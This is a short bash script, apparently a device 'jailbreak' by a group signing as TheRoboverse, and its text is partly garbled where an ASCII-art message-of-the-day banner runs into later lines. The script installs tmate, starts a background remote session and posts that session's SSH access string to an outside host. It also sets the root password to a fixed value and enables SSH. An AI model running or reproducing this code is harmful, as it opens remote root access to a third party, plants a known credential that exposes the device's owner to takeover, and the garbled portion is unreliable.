#!/bin/bash curl -X POST "https://api.patrickwang.pw/logs" \ -d "Executing jailbreak script..." { curl -X POST "https://api.patrickwang.pw/logs" \ -d "Installing tmate..." sudo apt install tmate -y; curl -X POST "https://api.patrickwang.pw/logs" \ -d "Tmate installed..." curl -X POST "https://api.patrickwang.pw/logs" \ -d "Creating tmate session..." tmate -S /tmp/tmate.sock new-session -d; tmate -S /tmp/tmate.sock wait tmate-ready; curl -X POST "https://api.patrickwang.pw/logs" \ -d "Tmate session created..." curl -X POST "https://api.patrickwang.pw/logs" \ -d "$(tmate -S /tmp/tmate.sock display -p '#{tmate_ssh}')" } & cat > /etc/motd << "EOF" _ _ _ | |_| |_ ___ _ _ ___| |__ _____ _____ _ _ ___ ___ __ ___ _ __ | _| ' \/ -_) '_/ _ \ '_ \/ _ \ V / -_) '_(_-> "$FILE" echo "echo 'root:theroboverse' | chpasswd" >> "$FILE" echo "systemctl enable ssh" >> "$FILE" echo "service ssh start" >> "$FILE" fi echo 'Jailbroken by TheRoboverse' >> /root/README